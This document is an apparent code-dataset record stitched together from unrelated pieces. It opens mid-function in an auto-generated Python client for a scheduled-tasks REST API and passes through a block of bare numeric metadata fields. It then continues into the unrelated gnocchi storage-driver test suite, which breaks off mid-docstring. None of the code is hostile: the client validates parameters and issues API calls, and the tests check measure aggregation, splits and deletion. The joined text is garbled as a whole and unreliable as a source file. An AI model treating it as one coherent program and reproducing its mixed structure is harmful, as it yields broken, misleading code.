raise ValueError("Missing the required parameter `scheduled_task_id` when calling `modify_scheduled_task`") # noqa: E501
# verify the required parameter 'scheduled_task' is set
if ('scheduled_task' not in params or
params['scheduled_task'] is None):
raise ValueError("Missing the required parameter `scheduled_task` when calling `modify_scheduled_task`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `modify_scheduled_task`") # noqa: E501
if 'scheduled_task_id' in params and not re.search('\\d+', str(params['scheduled_task_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `scheduled_task_id` when calling `modify_scheduled_task`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'scheduled_task_id' in params:
path_params['scheduledTaskID'] = params['scheduled_task_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'scheduled_task' in params:
body_params = params['scheduled_task']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/scheduledtasks/{scheduledTaskID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTask', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_scheduled_tasks(self, api_version, **kwargs): # noqa: E501
"""Search Scheduled Tasks # noqa: E501
Search for scheduled tasks using optional filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_scheduled_tasks(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:param SearchFilter search_filter: A collection of options used to filter the search results.
:return: ScheduledTasks
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_scheduled_tasks_with_http_info(api_version, **kwargs) # noqa: E501
else:
(data) = self.search_scheduled_tasks_with_http_info(api_version, **kwargs) # noqa: E501
return data
def search_scheduled_tasks_with_http_info(self, api_version, **kwargs): # noqa: E501
"""Search Scheduled Tasks # noqa: E501
Search for scheduled tasks using optional filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_scheduled_tasks_with_http_info(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:param SearchFilter search_filter: A collection of options used to filter the search results.
:return: ScheduledTasks
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_version', 'search_filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_scheduled_tasks" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `search_scheduled_tasks`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'search_filter' in params:
body_params = params['search_filter']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/scheduledtasks/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ScheduledTasks', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 45.10162
| 311
| 0.621833
| 3,531
| 30,624
| 5.136505
| 0.058907
| 0.107515
| 0.04466
| 0.026465
| 0.957104
| 0.954513
| 0.951811
| 0.94514
| 0.942218
| 0.938965
| 0
| 0.016329
| 0.294083
| 30,624
| 678
| 312
| 45.168142
| 0.822648
| 0.330623
| 0
| 0.803279
| 0
| 0
| 0.23793
| 0.058696
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035519
| false
| 0
| 0.010929
| 0
| 0.098361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d6846c30ed920c7c807ab14b12bc875543791a3
| 54,968
|
py
|
Python
|
gnocchi/tests/test_storage.py
|
yi-cloud/gnocchi
|
72286fefdedef71a37104f7a535e4ed2b3a99f15
|
[
"Apache-2.0"
] | null | null | null |
gnocchi/tests/test_storage.py
|
yi-cloud/gnocchi
|
72286fefdedef71a37104f7a535e4ed2b3a99f15
|
[
"Apache-2.0"
] | null | null | null |
gnocchi/tests/test_storage.py
|
yi-cloud/gnocchi
|
72286fefdedef71a37104f7a535e4ed2b3a99f15
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
#
# Copyright © 2014-2015 eNovance
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import uuid
import mock
import numpy
import six.moves
from gnocchi import archive_policy
from gnocchi import carbonara
from gnocchi import incoming
from gnocchi import indexer
from gnocchi import storage
from gnocchi.storage import ceph
from gnocchi.storage import file
from gnocchi.storage import redis
from gnocchi.storage import s3
from gnocchi.storage import swift
from gnocchi.tests import base as tests_base
def datetime64(*args):
    """Shorthand: build a ``numpy.datetime64`` from datetime fields.

    *args* are forwarded to :class:`datetime.datetime`, e.g.
    ``datetime64(2014, 1, 1, 12, 0, 1)``.
    """
    as_datetime = datetime.datetime(*args)
    return numpy.datetime64(as_datetime)
class TestStorageDriver(tests_base.TestCase):
    def setUp(self):
        """Create the default metric that most tests operate on."""
        super(TestStorageDriver, self).setUp()
        # A lot of tests wants a metric, create one
        self.metric, __ = self._create_metric()
    def test_driver_str(self):
        """str(driver) embeds the class name and a per-driver identifier."""
        driver = storage.get_driver(self.conf)
        # Each backend exposes its "location" under a different attribute;
        # pick the one matching the configured driver.
        if isinstance(driver, file.FileStorage):
            s = driver.basepath
        elif isinstance(driver, ceph.CephStorage):
            s = driver.rados.get_fsid()
        elif isinstance(driver, redis.RedisStorage):
            s = driver._client
        elif isinstance(driver, s3.S3Storage):
            s = driver._bucket_name
        elif isinstance(driver, swift.SwiftStorage):
            s = driver._container_prefix
        # NOTE(review): `s` is unbound if the driver is none of the types
        # above -- presumably the test matrix only runs known drivers.
        self.assertEqual(str(driver), "%s: %s" % (
            driver.__class__.__name__, s))
def test_get_driver(self):
driver = storage.get_driver(self.conf)
self.assertIsInstance(driver, storage.StorageDriver)
    def test_file_driver_subdir_len(self):
        """Metric directory layout follows the configured subdir length."""
        driver = storage.get_driver(self.conf)
        if not isinstance(driver, file.FileStorage):
            self.skipTest("not file driver")
        # Check the default
        self.assertEqual(2, driver.SUBDIR_LEN)
        metric = mock.Mock(id=uuid.UUID("12345678901234567890123456789012"))
        # Default: the 32 hex chars split into sixteen 2-char levels.
        expected = (driver.basepath + "/12/34/56/78/90/12/34/56/78/90/12/34/56"
                    "/78/90/12/12345678-9012-3456-7890-123456789012")
        self.assertEqual(expected, driver._build_metric_dir(metric))
        # 16 divides 32 evenly: two 16-char levels.
        driver._file_subdir_len = 16
        expected = (driver.basepath + "/1234567890123456/7890123456"
                    "789012/12345678-9012-3456-7890-123456789012")
        self.assertEqual(expected, driver._build_metric_dir(metric))
        # 15 does not divide 32: the 2-char remainder gets its own level.
        driver._file_subdir_len = 15
        expected = (driver.basepath + "/123456789012345/67890123456"
                    "7890/12/12345678-9012-3456-7890-123456789012")
        self.assertEqual(expected, driver._build_metric_dir(metric))
    def test_corrupted_split(self):
        """A split that fails to unserialize yields an empty timeserie."""
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
        ])
        self.trigger_processing()
        aggregation = self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(5, 'm'))
        # Force unserialization to fail as if the stored split were corrupt.
        with mock.patch('gnocchi.carbonara.AggregatedTimeSerie.unserialize',
                        side_effect=carbonara.InvalidData()):
            results = self.storage._get_splits_and_unserialize({
                self.metric: {
                    aggregation: [
                        carbonara.SplitKey(
                            numpy.datetime64(1387800000, 's'),
                            numpy.timedelta64(5, 'm'))
                    ],
                },
            })[self.metric][aggregation]
        self.assertEqual(1, len(results))
        self.assertIsInstance(results[0], carbonara.AggregatedTimeSerie)
        # Assert it's an empty one since corrupted
        self.assertEqual(0, len(results[0]))
        self.assertEqual(results[0].aggregation, aggregation)
    def test_get_splits_and_unserialize(self):
        """A valid stored split unserializes to a non-empty timeserie."""
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
        ])
        self.trigger_processing()
        aggregation = self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(5, 'm'))
        results = self.storage._get_splits_and_unserialize({
            self.metric: {
                aggregation: [
                    carbonara.SplitKey(
                        numpy.datetime64(1387800000, 's'),
                        numpy.timedelta64(5, 'm')),
                ],
            },
        })[self.metric][aggregation]
        self.assertEqual(1, len(results))
        self.assertIsInstance(results[0], carbonara.AggregatedTimeSerie)
        # Assert it's not an empty one, since the split is valid (contrast
        # with test_corrupted_split above)
        self.assertGreater(len(results[0]), 0)
        self.assertEqual(results[0].aggregation, aggregation)
    def test_corrupted_data(self):
        """Corrupted stored series are dropped; new measures still land."""
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
        ])
        self.trigger_processing()
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2014, 1, 1, 13, 0, 1), 1),
        ])
        # Both the aggregated and the unaggregated series read back as
        # corrupt while the second batch is processed.
        with mock.patch('gnocchi.carbonara.AggregatedTimeSerie.unserialize',
                        side_effect=carbonara.InvalidData()):
            with mock.patch('gnocchi.carbonara.BoundTimeSerie.unserialize',
                            side_effect=carbonara.InvalidData()):
                self.trigger_processing()
        m = self.storage.get_measures(
            self.metric,
            self.metric.archive_policy.get_aggregations_for_method('mean'),
        )['mean']
        # Only the new (13:00) point survives, at every granularity.
        self.assertIn((datetime64(2014, 1, 1),
                       numpy.timedelta64(1, 'D'), 1), m)
        self.assertIn((datetime64(2014, 1, 1, 13),
                       numpy.timedelta64(1, 'h'), 1), m)
        self.assertIn((datetime64(2014, 1, 1, 13),
                       numpy.timedelta64(5, 'm'), 1), m)
    def test_aborted_initial_processing(self):
        """A crashed first processing pass can be retried cleanly."""
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 5),
        ])
        # Simulate a crash while storing the unaggregated timeseries.
        with mock.patch.object(self.storage, '_store_unaggregated_timeseries',
                               side_effect=Exception):
            try:
                self.trigger_processing()
            except Exception:
                pass
        # The retry must succeed without logging any error.
        with mock.patch('gnocchi.storage.LOG') as LOG:
            self.trigger_processing()
        self.assertFalse(LOG.error.called)
        aggregations = (
            self.metric.archive_policy.get_aggregations_for_method("mean")
        )
        m = self.storage.get_measures(self.metric, aggregations)['mean']
        self.assertIn((datetime64(2014, 1, 1),
                       numpy.timedelta64(1, 'D'), 5.0), m)
        self.assertIn((datetime64(2014, 1, 1, 12),
                       numpy.timedelta64(1, 'h'), 5.0), m)
        self.assertIn((datetime64(2014, 1, 1, 12),
                       numpy.timedelta64(5, 'm'), 5.0), m)
    def test_delete_nonempty_metric(self):
        """Deleting a metric with data removes all its stored series."""
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
        ])
        self.trigger_processing()
        self.storage._delete_metric(self.metric)
        self.trigger_processing()
        aggregations = (
            self.metric.archive_policy.get_aggregations_for_method("mean")
        )
        # Reads must now fail, and the unaggregated series must be gone.
        self.assertRaises(storage.MetricDoesNotExist,
                          self.storage.get_measures,
                          self.metric, aggregations)
        self.assertEqual(
            {self.metric: None},
            self.storage._get_or_create_unaggregated_timeseries([self.metric]))
def test_measures_reporting_format(self):
report = self.incoming.measures_report(True)
self.assertIsInstance(report, dict)
self.assertIn('summary', report)
self.assertIn('metrics', report['summary'])
self.assertIn('measures', report['summary'])
self.assertIn('details', report)
self.assertIsInstance(report['details'], dict)
report = self.incoming.measures_report(False)
self.assertIsInstance(report, dict)
self.assertIn('summary', report)
self.assertIn('metrics', report['summary'])
self.assertIn('measures', report['summary'])
self.assertNotIn('details', report)
    def test_measures_reporting(self):
        """measures_report() counts queued metrics and measures."""
        m2, __ = self._create_metric('medium')
        # Queue 60 measures on each of the two metrics, left unprocessed.
        for i in six.moves.range(60):
            self.incoming.add_measures(self.metric.id, [
                incoming.Measure(datetime64(2014, 1, 1, 12, 0, i), 69),
            ])
            self.incoming.add_measures(m2.id, [
                incoming.Measure(datetime64(2014, 1, 1, 12, 0, i), 69),
            ])
        report = self.incoming.measures_report(True)
        self.assertIsInstance(report, dict)
        self.assertEqual(2, report['summary']['metrics'])
        self.assertEqual(120, report['summary']['measures'])
        self.assertIn('details', report)
        self.assertIsInstance(report['details'], dict)
        report = self.incoming.measures_report(False)
        self.assertIsInstance(report, dict)
        self.assertEqual(2, report['summary']['metrics'])
        self.assertEqual(120, report['summary']['measures'])
    def test_get_aggregated_measures(self):
        """get_aggregated_measures covers every requested aggregation."""
        # One point per second over a full hour.
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2014, 1, 1, 12, i, j), 100)
            for i in six.moves.range(0, 60) for j in six.moves.range(0, 60)])
        self.trigger_processing([self.metric])
        aggregations = self.metric.archive_policy.aggregations
        measures = self.storage.get_aggregated_measures(
            {self.metric: aggregations})
        self.assertEqual(1, len(measures))
        self.assertIn(self.metric, measures)
        measures = measures[self.metric]
        # One (non-empty) result per aggregation, tagged with it.
        self.assertEqual(len(aggregations), len(measures))
        self.assertGreater(len(measures[aggregations[0]]), 0)
        for agg in aggregations:
            self.assertEqual(agg, measures[agg].aggregation)
    def test_get_aggregated_measures_multiple(self):
        """get_aggregated_measures handles several metrics in one call."""
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2014, 1, 1, 12, i, j), 100)
            for i in six.moves.range(0, 60) for j in six.moves.range(0, 60)])
        m2, __ = self._create_metric('medium')
        self.incoming.add_measures(m2.id, [
            incoming.Measure(datetime64(2014, 1, 1, 12, i, j), 100)
            for i in six.moves.range(0, 60) for j in six.moves.range(0, 60)])
        self.trigger_processing([self.metric, m2])
        aggregations = self.metric.archive_policy.aggregations
        # Each metric is queried with its own archive policy's aggregations.
        measures = self.storage.get_aggregated_measures(
            {self.metric: aggregations,
             m2: m2.archive_policy.aggregations})
        self.assertEqual({self.metric, m2}, set(measures.keys()))
        self.assertEqual(len(aggregations), len(measures[self.metric]))
        self.assertGreater(len(measures[self.metric][aggregations[0]]), 0)
        for agg in aggregations:
            self.assertEqual(agg, measures[self.metric][agg].aggregation)
        self.assertEqual(len(m2.archive_policy.aggregations),
                         len(measures[m2]))
        self.assertGreater(
            len(measures[m2][m2.archive_policy.aggregations[0]]), 0)
        for agg in m2.archive_policy.aggregations:
            self.assertEqual(agg, measures[m2][agg].aggregation)
    def test_add_measures_big(self):
        """An hour of one-second measures aggregates to 3661 mean points."""
        m, __ = self._create_metric('high')
        self.incoming.add_measures(m.id, [
            incoming.Measure(datetime64(2014, 1, 1, 12, i, j), 100)
            for i in six.moves.range(0, 60) for j in six.moves.range(0, 60)])
        self.trigger_processing([m])
        aggregations = (
            m.archive_policy.get_aggregations_for_method("mean")
        )
        # 3600 one-second + 60 one-minute + 1 one-hour points = 3661.
        self.assertEqual(3661, len(
            self.storage.get_measures(m, aggregations)['mean']))
    @mock.patch('gnocchi.carbonara.SplitKey.POINTS_PER_SPLIT', 48)
    def test_add_measures_update_subset_split(self):
        """Updating the last point rewrites only the split containing it."""
        m, m_sql = self._create_metric('medium')
        measures = [
            incoming.Measure(datetime64(2014, 1, 6, i, j, 0), 100)
            for i in six.moves.range(2) for j in six.moves.range(0, 60, 2)]
        self.incoming.add_measures(m.id, measures)
        self.trigger_processing([m])
        # add measure to end, in same aggregate time as last point.
        self.incoming.add_measures(m.id, [
            incoming.Measure(datetime64(2014, 1, 6, 1, 58, 1), 100)])
        with mock.patch.object(self.storage, '_store_metric_splits') as c:
            # should only resample last aggregate
            self.trigger_processing([m])
        # Count how many 1-minute "mean" splits were written for our metric.
        count = 0
        for call in c.mock_calls:
            # policy is 60 points and split is 48. should only update 2nd half
            args = call[1]
            for metric, key_agg_data_offset in six.iteritems(args[0]):
                if metric.id == m_sql.id:
                    for key, aggregation, data, offset in key_agg_data_offset:
                        if (key.sampling == numpy.timedelta64(1, 'm')
                                and aggregation.method == "mean"):
                            count += 1
        self.assertEqual(1, count)
    def test_add_measures_update_subset(self):
        """Reprocessing starts at the aggregate containing the new point."""
        m, m_sql = self._create_metric('medium')
        measures = [
            incoming.Measure(datetime64(2014, 1, 6, i, j, 0), 100)
            for i in six.moves.range(2) for j in six.moves.range(0, 60, 2)]
        self.incoming.add_measures(m.id, measures)
        self.trigger_processing([m])
        # add measure to end, in same aggregate time as last point.
        new_point = datetime64(2014, 1, 6, 1, 58, 1)
        self.incoming.add_measures(m.id, [incoming.Measure(new_point, 100)])
        with mock.patch.object(self.incoming, 'add_measures') as c:
            self.trigger_processing([m])
        # Every recorded call must begin at new_point rounded down to the
        # aggregate's granularity (granularity is seconds, hence * 10e8 to
        # reach the nanosecond timestamps used by round_timestamp).
        for __, args, __ in c.mock_calls:
            self.assertEqual(
                list(args[3])[0][0], carbonara.round_timestamp(
                    new_point, args[1].granularity * 10e8))
    def test_delete_old_measures(self):
        """Old points beyond the archive policy's span are expired."""
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2014, 1, 1, 12, 0, 1), 69),
            incoming.Measure(datetime64(2014, 1, 1, 12, 7, 31), 42),
            incoming.Measure(datetime64(2014, 1, 1, 12, 9, 31), 4),
            incoming.Measure(datetime64(2014, 1, 1, 12, 12, 45), 44),
        ])
        self.trigger_processing()
        aggregations = (
            self.metric.archive_policy.get_aggregations_for_method("mean")
        )
        self.assertEqual({"mean": [
            (datetime64(2014, 1, 1), numpy.timedelta64(1, 'D'), 39.75),
            (datetime64(2014, 1, 1, 12), numpy.timedelta64(1, 'h'), 39.75),
            (datetime64(2014, 1, 1, 12), numpy.timedelta64(5, 'm'), 69.0),
            (datetime64(2014, 1, 1, 12, 5), numpy.timedelta64(5, 'm'), 23.0),
            (datetime64(2014, 1, 1, 12, 10), numpy.timedelta64(5, 'm'), 44.0),
        ]}, self.storage.get_measures(self.metric, aggregations))
        # One year later…
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2015, 1, 1, 12, 0, 1), 69),
        ])
        self.trigger_processing()
        # The 2014 points have aged out; only the 2015 point remains.
        self.assertEqual({"mean": [
            (datetime64(2015, 1, 1), numpy.timedelta64(1, 'D'), 69),
            (datetime64(2015, 1, 1, 12), numpy.timedelta64(1, 'h'), 69),
            (datetime64(2015, 1, 1, 12), numpy.timedelta64(5, 'm'), 69),
        ]}, self.storage.get_measures(self.metric, aggregations))
        # A single split per granularity should be left on disk.
        agg = self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(1, 'D'))
        self.assertEqual({
            self.metric: {
                agg: {carbonara.SplitKey(numpy.datetime64(1244160000, 's'),
                                         numpy.timedelta64(1, 'D'))},
            },
        }, self.storage._list_split_keys({self.metric: [agg]}))
        agg = self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(1, 'h'))
        self.assertEqual({
            self.metric: {
                agg: {carbonara.SplitKey(numpy.datetime64(1412640000, 's'),
                                         numpy.timedelta64(1, 'h'))},
            },
        }, self.storage._list_split_keys({self.metric: [agg]}))
        agg = self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(5, 'm'))
        self.assertEqual({
            self.metric: {
                agg: {carbonara.SplitKey(numpy.datetime64(1419120000, 's'),
                                         numpy.timedelta64(5, 'm'))},
            }
        }, self.storage._list_split_keys({self.metric: [agg]}))
    def test_get_measures_return(self):
        """_get_splits keeps request order, returning None for misses."""
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2016, 1, 1, 12, 0, 1), 69),
            incoming.Measure(datetime64(2016, 1, 2, 13, 7, 31), 42),
            incoming.Measure(datetime64(2016, 1, 4, 14, 9, 31), 4),
            incoming.Measure(datetime64(2016, 1, 6, 15, 12, 45), 44),
        ])
        self.trigger_processing()
        aggregation = self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(5, 'm'))
        data = self.storage._get_splits({
            self.metric: {
                aggregation: [
                    carbonara.SplitKey(
                        numpy.datetime64(1451520000, 's'),
                        numpy.timedelta64(5, 'm'),
                    )]}})
        self.assertEqual(1, len(data))
        data = data[self.metric]
        self.assertEqual(1, len(data))
        data = data[aggregation]
        self.assertEqual(1, len(data))
        self.assertIsInstance(data[0], bytes)
        self.assertGreater(len(data[0]), 0)
        existing = data[0]
        # Now retrieve an existing and a non-existing key
        data = self.storage._get_splits({
            self.metric: {
                aggregation: [
                    carbonara.SplitKey(
                        numpy.datetime64(1451520000, 's'),
                        numpy.timedelta64(5, 'm'),
                    ),
                    carbonara.SplitKey(
                        numpy.datetime64(1451520010, 's'),
                        numpy.timedelta64(5, 'm'),
                    ),
                ]}})
        self.assertEqual(1, len(data))
        data = data[self.metric]
        self.assertEqual(1, len(data))
        data = data[aggregation]
        self.assertEqual(2, len(data))
        self.assertIsInstance(data[0], bytes)
        self.assertGreater(len(data[0]), 0)
        self.assertEqual(existing, data[0])
        self.assertIsNone(data[1])
        # Now retrieve a non-existing and an existing key
        data = self.storage._get_splits({
            self.metric: {
                aggregation: [
                    carbonara.SplitKey(
                        numpy.datetime64(155152000, 's'),
                        numpy.timedelta64(5, 'm'),
                    ),
                    carbonara.SplitKey(
                        numpy.datetime64(1451520000, 's'),
                        numpy.timedelta64(5, 'm'),
                    )
                ]}})
        self.assertEqual(1, len(data))
        data = data[self.metric]
        self.assertEqual(1, len(data))
        data = data[aggregation]
        self.assertEqual(2, len(data))
        self.assertIsInstance(data[1], bytes)
        self.assertGreater(len(data[1]), 0)
        self.assertEqual(existing, data[1])
        self.assertIsNone(data[0])
        m2, _ = self._create_metric()
        # Now retrieve a non-existing (= no aggregated measures) metric
        data = self.storage._get_splits({
            m2: {
                aggregation: [
                    carbonara.SplitKey(
                        numpy.datetime64(1451520010, 's'),
                        numpy.timedelta64(5, 'm'),
                    ),
                    carbonara.SplitKey(
                        numpy.datetime64(1451520000, 's'),
                        numpy.timedelta64(5, 'm'),
                    )
                ]}})
        self.assertEqual({m2: {aggregation: [None, None]}}, data)
    def test_rewrite_measures(self):
        """New points trigger a rewrite (and compression) of older splits."""
        # Create an archive policy that spans on several splits. Each split
        # being 3600 points, let's go for 36k points so we have 10 splits.
        apname = str(uuid.uuid4())
        ap = archive_policy.ArchivePolicy(apname, 0, [(36000, 60)])
        self.index.create_archive_policy(ap)
        self.metric = indexer.Metric(uuid.uuid4(), ap)
        self.index.create_metric(self.metric.id, str(uuid.uuid4()),
                                 apname)
        # First store some points scattered across different splits
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2016, 1, 1, 12, 0, 1), 69),
            incoming.Measure(datetime64(2016, 1, 2, 13, 7, 31), 42),
            incoming.Measure(datetime64(2016, 1, 4, 14, 9, 31), 4),
            incoming.Measure(datetime64(2016, 1, 6, 15, 12, 45), 44),
        ])
        self.trigger_processing()
        agg = self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(1, 'm'))
        self.assertEqual({
            self.metric: {
                agg: {
                    carbonara.SplitKey(numpy.datetime64(1451520000, 's'),
                                       numpy.timedelta64(1, 'm')),
                    carbonara.SplitKey(numpy.datetime64(1451736000, 's'),
                                       numpy.timedelta64(1, 'm')),
                    carbonara.SplitKey(numpy.datetime64(1451952000, 's'),
                                       numpy.timedelta64(1, 'm')),
                },
            }
        }, self.storage._list_split_keys({self.metric: [agg]}))
        # Drivers that always write full splits compress the latest split
        # too; others only compress the sealed (older) splits.
        if self.storage.WRITE_FULL:
            assertCompressedIfWriteFull = self.assertTrue
        else:
            assertCompressedIfWriteFull = self.assertFalse
        aggregation = self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(1, 'm'))
        data = self.storage._get_splits({
            self.metric: {
                aggregation: [carbonara.SplitKey(
                    numpy.datetime64(1451520000, 's'),
                    numpy.timedelta64(1, 'm'),
                )]}})[self.metric][aggregation][0]
        self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
        data = self.storage._get_splits({
            self.metric: {
                aggregation: [carbonara.SplitKey(
                    numpy.datetime64(1451736000, 's'),
                    numpy.timedelta64(60, 's'),
                )]}})[self.metric][aggregation][0]
        self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
        data = self.storage._get_splits({
            self.metric: {
                aggregation: [carbonara.SplitKey(
                    numpy.datetime64(1451952000, 's'),
                    numpy.timedelta64(60, 's'),
                )]}})[self.metric][aggregation][0]
        assertCompressedIfWriteFull(
            carbonara.AggregatedTimeSerie.is_compressed(data))
        self.assertEqual({"mean": [
            (datetime64(2016, 1, 1, 12), numpy.timedelta64(1, 'm'), 69),
            (datetime64(2016, 1, 2, 13, 7), numpy.timedelta64(1, 'm'), 42),
            (datetime64(2016, 1, 4, 14, 9), numpy.timedelta64(1, 'm'), 4),
            (datetime64(2016, 1, 6, 15, 12), numpy.timedelta64(1, 'm'), 44),
        ]}, self.storage.get_measures(self.metric, [aggregation]))
        # Now store brand new points that should force a rewrite of one of the
        # split (keep in mind the back window size in one hour here). We move
        # the BoundTimeSerie processing timeserie far away from its current
        # range.
        self.incoming.add_measures(self.metric.id, [
            incoming.Measure(datetime64(2016, 1, 10, 16, 18, 45), 45),
            incoming.Measure(datetime64(2016, 1, 10, 17, 12, 45), 46),
        ])
        self.trigger_processing()
        agg = self.metric.archive_policy.get_aggregation(
            "mean", numpy.timedelta64(1, 'm'))
        self.assertEqual({
            self.metric: {
                agg: {
                    carbonara.SplitKey(numpy.datetime64(1452384000, 's'),
                                       numpy.timedelta64(1, 'm')),
                    carbonara.SplitKey(numpy.datetime64(1451736000, 's'),
                                       numpy.timedelta64(1, 'm')),
                    carbonara.SplitKey(numpy.datetime64(1451520000, 's'),
                                       numpy.timedelta64(1, 'm')),
                    carbonara.SplitKey(numpy.datetime64(1451952000, 's'),
                                       numpy.timedelta64(1, 'm')),
                },
            },
        }, self.storage._list_split_keys({self.metric: [agg]}))
        data = self.storage._get_splits({
            self.metric: {
                aggregation: [carbonara.SplitKey(
                    numpy.datetime64(1451520000, 's'),
                    numpy.timedelta64(60, 's'),
                )]}})[self.metric][aggregation][0]
        self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
        data = self.storage._get_splits({
            self.metric: {
                aggregation: [carbonara.SplitKey(
                    numpy.datetime64(1451736000, 's'),
                    numpy.timedelta64(60, 's'),
                )]}})[self.metric][aggregation][0]
        self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
        data = self.storage._get_splits({
            self.metric: {
                aggregation: [carbonara.SplitKey(
                    numpy.datetime64(1451952000, 's'),
                    numpy.timedelta64(1, 'm'),
                )]}})[self.metric][aggregation][0]
        # Now this one is compressed because it has been rewritten!
        self.assertTrue(carbonara.AggregatedTimeSerie.is_compressed(data))
        data = self.storage._get_splits({
            self.metric: {
                aggregation: [
                    carbonara.SplitKey(
                        numpy.datetime64(1452384000, 's'),
                        numpy.timedelta64(60, 's'),
                    )]}})[self.metric][aggregation][0]
        assertCompressedIfWriteFull(
            carbonara.AggregatedTimeSerie.is_compressed(data))
        self.assertEqual({"mean": [
            (datetime64(2016, 1, 1, 12), numpy.timedelta64(1, 'm'), 69),
            (datetime64(2016, 1, 2, 13, 7), numpy.timedelta64(1, 'm'), 42),
            (datetime64(2016, 1, 4, 14, 9), numpy.timedelta64(1, 'm'), 4),
            (datetime64(2016, 1, 6, 15, 12), numpy.timedelta64(1, 'm'), 44),
            (datetime64(2016, 1, 10, 16, 18), numpy.timedelta64(1, 'm'), 45),
            (datetime64(2016, 1, 10, 17, 12), numpy.timedelta64(1, 'm'), 46),
        ]}, self.storage.get_measures(self.metric, [aggregation]))
def test_rewrite_measures_multiple_granularities(self):
    """Split rewrite with an archive policy holding two granularities.

    Processes a first batch of measures, then patches the storage
    driver's WRITE_FULL attribute to False so that the second batch
